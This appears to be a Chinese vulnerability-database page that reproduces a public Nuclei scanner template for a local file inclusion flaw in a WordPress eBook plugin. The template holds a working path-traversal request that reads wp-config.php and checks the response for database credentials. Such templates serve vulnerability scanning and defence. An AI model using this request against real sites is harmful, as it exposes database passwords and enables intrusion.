aspose-file-download: Wordpress Aspose Cloud eBook Generator - Local File Inclusion

日期: 2025-08-01 | 影响软件: aspose-file-download | POC: 已公开

漏洞描述

Wordpress Aspose Cloud eBook Generator is vulnerable to local file inclusion.

PoC代码[已公开]

id: aspose-file-download

info:
  name: Wordpress Aspose Cloud eBook Generator - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Wordpress Aspose Cloud eBook Generator is vulnerable to local file inclusion.
  reference:
    - https://wpscan.com/vulnerability/7866
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: aspose,ebook,wpscan,wordpress,wp-plugin,lfi,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207d8cb17e2732e502d921fb444042a8db942deed735c4748af025edc0366d944d0221008a5e964b32a6753305129214e915d31cc0f5e0046faefc605b66db55e5e9cee2:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/wordpress/aspose-file-download.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐